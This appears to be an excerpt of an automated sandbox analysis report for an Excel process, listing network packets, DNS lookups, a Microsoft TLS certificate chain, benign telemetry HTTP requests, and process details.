            Mar 11, 2025 07:12:49.532469988 CET49735443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:49.532486916 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.781712055 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.784219027 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.784291029 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:50.784373045 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.785867929 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.785933971 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:50.785958052 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.787384033 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.787442923 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:50.787456989 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.793490887 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:50.793525934 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:51.230350018 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:51.231861115 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:51.231905937 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:51.643471003 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:51.687755108 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:51.774450064 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:51.828399897 CET49736443192.168.2.413.107.246.60
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Mar 11, 2025 07:12:43.379873037 CET | 56179 | 53 | 192.168.2.4 | 1.1.1.1
            Mar 11, 2025 07:12:43.387593985 CET | 53 | 56179 | 1.1.1.1 | 192.168.2.4
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Mar 11, 2025 07:12:43.379873037 CET | 192.168.2.4 | 1.1.1.1 | 0x8d5a | Standard query (0) | otelrules.svc.static.microsoft | A (IP address) | IN (0x0001) | false
            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Mar 11, 2025 07:11:41.670691013 CET | 1.1.1.1 | 192.168.2.4 | 0x267a | No error (0) | ecs-office.s-0005.dual-s-msedge.net | s-0005.dual-s-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
            Mar 11, 2025 07:11:41.670691013 CET | 1.1.1.1 | 192.168.2.4 | 0x267a | No error (0) | s-0005.dual-s-msedge.net |  | 52.123.128.14 | A (IP address) | IN (0x0001) | false
            Mar 11, 2025 07:11:41.670691013 CET | 1.1.1.1 | 192.168.2.4 | 0x267a | No error (0) | s-0005.dual-s-msedge.net |  | 52.123.129.14 | A (IP address) | IN (0x0001) | false
            Mar 11, 2025 07:12:43.387593985 CET | 1.1.1.1 | 192.168.2.4 | 0x8d5a | No error (0) | otelrules.svc.static.microsoft | otelrules-bzhndjfje8dvh5fd.z01.azurefd.net |  | CNAME (Canonical name) | IN (0x0001) | false
            Mar 11, 2025 07:12:43.387593985 CET | 1.1.1.1 | 192.168.2.4 | 0x8d5a | No error (0) | otelrules-bzhndjfje8dvh5fd.z01.azurefd.net | star-azurefd-prod.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001) | false
            Mar 11, 2025 07:12:43.387593985 CET | 1.1.1.1 | 192.168.2.4 | 0x8d5a | No error (0) | star-azurefd-prod.trafficmanager.net | shed.dual-low.s-part-0032.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
            Mar 11, 2025 07:12:43.387593985 CET | 1.1.1.1 | 192.168.2.4 | 0x8d5a | No error (0) | shed.dual-low.s-part-0032.t-0009.t-msedge.net | s-part-0032.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
            Mar 11, 2025 07:12:43.387593985 CET | 1.1.1.1 | 192.168.2.4 | 0x8d5a | No error (0) | s-part-0032.t-0009.t-msedge.net |  | 13.107.246.60 | A (IP address) | IN (0x0001) | false
            • otelrules.svc.static.microsoft
            Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
            Mar 11, 2025 07:12:50.785958052 CET | 13.107.246.60 | 443 | 192.168.2.4 | 49736 | CN=otelrules.svc.static.microsoft, O=Microsoft Corporation, L=Redmond, ST=WA, C=US | CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US | Tue Feb 04 01:57:58 CET 2025 | Sun Aug 03 02:57:58 CEST 2025 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0 | a0e9f5d64349fb13191bc781f81f42e1
             |  |  |  |  | CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US | CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Jun 08 02:00:00 CEST 2023 | Wed Aug 26 01:59:59 CEST 2026 |  | 
             |  |  |  |  | CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Aug 01 14:00:00 CEST 2013 | Fri Jan 15 13:00:00 CET 2038 |  | 
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.4 | 49734 | 13.107.246.60 | 443 | 8120 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            Timestamp | Bytes transferred | Direction | Data
            2025-03-11 06:12:46 UTC | 226 | OUT | GET /rules/excel.exe-Production-v19.bundle HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
            Host: otelrules.svc.static.microsoft


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.4 | 49735 | 13.107.246.60 | 443 | 8120 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            Timestamp | Bytes transferred | Direction | Data
            2025-03-11 06:12:49 UTC | 214 | OUT | GET /rules/rule120600v5s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
            Host: otelrules.svc.static.microsoft
            2025-03-11 06:12:49 UTC | 494 | IN | HTTP/1.1 200 OK
            Date: Tue, 11 Mar 2025 06:12:49 GMT
            Content-Type: text/xml
            Content-Length: 3870
            Connection: close
            Vary: Accept-Encoding
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 19 Nov 2024 13:00:34 GMT
            ETag: "0x8DD089A27B58D5A"
            x-ms-request-id: 5b07f980-001e-0028-5100-92c49f000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20250311T061249Z-178d6db7786vmv9phC1MIA10r400000005xg00000000ev6f
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2025-03-11 06:12:49 UTC | 3870 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="5" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


            Target ID:0
            Start time:02:11:33
            Start date:11/03/2025
            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
            Imagebase:0x320000
            File size:53'161'064 bytes
            MD5 hash:4A871771235598812032C822E6F68F19
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:17
            Start time:02:12:38
            Start date:11/03/2025
            Path:C:\Windows\splwow64.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\splwow64.exe 12288
            Imagebase:0x7ff7a4280000
            File size:163'840 bytes
            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            No disassembly